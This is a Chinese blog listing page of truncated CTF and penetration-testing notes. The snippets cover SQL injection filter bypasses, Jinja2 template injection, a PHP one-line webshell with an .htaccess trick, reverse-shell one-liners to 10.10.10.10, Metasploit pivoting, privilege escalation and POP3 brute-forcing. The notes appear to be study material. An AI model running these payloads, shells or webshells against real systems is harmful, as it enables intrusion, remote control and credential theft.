三十功名尘与土,八千里路云和月
11
27
签到·好玩的PHP 签到·好玩的PHP
PHP反序列化要点:if (($dsb !== $this->ctf) && ($this->ctf !== $dsb)) 两个等于号用类型不同来绕过。 if($a == $b) 或 if($a != $b
2024-11-27 0x00dream
25
CTFshow_web CTFshow_web
web7:联合查询注入过滤空格(考点:联合查询注入绕过)将空格换为%09或/**/来绕过 获取表名payload id=-1/**/union/**/select/**/1,group_concat(table_name),3/**/fro
2024-11-25 0x00dream
23
buu_SSTI buu_SSTI
http://d25e1d74-e7dc-41be-9342-20a070f723fe.node5.buuoj.cn:81/?password={{2*3}} 得到 可知,存在jinja2模板注入 1.方法一,手工?password={{
2024-11-23 0x00dream
23
SSTI模板注入 SSTI模板注入
使用的框架不同,模板引擎的解析符号也不同。 #一、python的SSTI攻击过程(Jinja2) ?name={{''.__class__.__base__.__subclasses__()}} # 查看所有可用类 从上面的可用
2024-11-23 0x00dream
21
内网穿透 内网穿透
1.msf内网穿透(跨路由)msf拿到跳板机的shell后拿到flag1,便进入到meterpreter后渗透,进行内网信息收集——查看靶机上的内网路由地址,然后将其添加到本地代理中进行内网穿透。 meterpreter> run g
2024-11-21 0x00dream
21
反弹shell 反弹shell
bash -i sh -i >& /dev/tcp/10.10.10.10/9001 0>&1 nc -e nc 10.10.10.10 9001 -e sh nc.exe -e nc.exe 10.10.1
2024-11-21 0x00dream
21
sql注入 sql注入
1.类型1.1宽字节注入1.1.1原理首先,一个字节为窄字节,两个字节为宽字节。 由于php开启了magicqoutes魔法函数,会将用户输入的特殊字符(包括单引号,双引号,空格等)前面加一个反斜杠来进行转义, mysql的编码方式为GBK
2024-11-21 0x00dream
20
提权 提权
1.系统内核漏洞提权uname -a #查看系统内核和版本信息 然后searchexploit查找漏洞的exp searchexploit 39166 # ubantu 14.04 的提权脚本 或者http://www.exploit
2024-11-20 0x00dream
19
一句话木马 一句话木马
1.php一句话木马<?php @eval($_POST['cmd']); ?> .htaccess配置文件 <FilesMatch "1.jpg"> sethandler application/x-httpd-
2024-11-19 0x00dream
19
pop3登录指令 pop3登录指令
hydra暴力破解pop3用户名密码后,使用nc 登录进去 nc 192.168.18.20 <port> user <username> pass <password> list # 返回每个邮件的大
2024-11-19 0x00dream
19